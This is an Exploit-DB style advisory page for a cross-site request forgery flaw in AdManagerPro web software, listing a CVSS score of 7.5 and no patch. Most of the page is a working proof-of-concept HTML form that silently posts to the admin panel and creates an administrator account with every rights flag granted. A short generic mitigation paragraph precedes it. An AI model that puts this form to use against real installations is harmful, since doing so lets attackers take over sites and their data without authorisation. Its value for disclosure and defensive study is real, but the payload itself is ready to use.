AdManagerPro - [ CSRF ] Create Administrator Account

vendor:

AdManagerPro

by:

bi0

7.5

CVSS

HIGH

CSRF

CWE

Product Name: AdManagerPro

Affected Version From:

Affected Version To:

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

AdManagerPro – [ CSRF ] Create Administrator Account

The AdManagerPro software is vulnerable to a CSRF (Cross-Site Request Forgery) attack that allows an attacker to create a new administrator account without proper authentication. By exploiting this vulnerability, an attacker can gain unauthorized access to the system and perform malicious actions.

Mitigation:

To mitigate this vulnerability, it is recommended to implement proper CSRF protection mechanisms in the AdManagerPro software. This can include using anti-CSRF tokens, validating requests with a unique identifier, and implementing strong authentication mechanisms.

Source

Exploit-DB raw data:

                ______     __     ______
               /\  == \   /\ \   /\  __ \
               \ \  __<   \ \ \  \ \ \/\ \
                \ \_____\  \ \_\  \ \_____\
                 \/_____/   \/_/   \/_____/

                 01000010 01101001 01001111

[#]----------------------------------------------------------------[#]
#
# [+] AdManagerPro - [ CSRF ] Create Administrator Account
#
#  // Author Info
# [x] Author: bi0
# [x] Contact: bukibv@hotmail.com
# [x] Homepage : www.ssteam.ws
# [x] Thanks: sp1r1t,packetdeath,Zer0flag,redking and ssteam.ws ...
#
[#]-------------------------------------------------------------------------------------------[#]
#
# [x] Exploit :
#
# [ CSRF ]
#
#     [ Login ]
#     http://localhost/[path]/administration/index.php
#
# // Start CSRF
|-------------------------------------------------------------------------------|
<form action="http://[server]/[path]/administration/admins.php" method="POST">
  <input type="hidden" name="action" value="admin_created">
  <input  name="username" value="adminlol" maxlength=15>
  <input  name="password" maxlength=15 value="adminlol">
  <input  name="email" maxlength="255" value="test@demo.com">
  <input  name="name" maxlength="255" value="adminlol">
<input type="hidden" name="rights[]" value="advertisers" CHECKED>
<input type="hidden" name="rights[]" value="packages" CHECKED>
<input type="hidden" name="rights[]" value="publishers" CHECKED>
<input type="hidden" name="rights[]" value="ads" CHECKED>
<input type="hidden" name="rights[]" value="def_ads" CHECKED>
<input type="hidden" name="rights[]" value="black_zones" CHECKED>
<input type="hidden" name="rights[]" value="backup" CHECKED>
<input type="hidden" name="rights[]" value="email_u" CHECKED>
<input type="hidden" name="rights[]" value="reset" CHECKED>
<input type="hidden" name="rights[]" value="tmpl_msg" CHECKED>
<input type="hidden" name="rights[]" value="admins" CHECKED>
<input type="hidden" name="rights[]" value="config" CHECKED>
<input type="submit" name="submit" value="Submit">
</form>
|-------------------------------------------------------------------------------|
# // End of attack
#
[#]------------------------------------------------------------------------------------------[#]

#EOF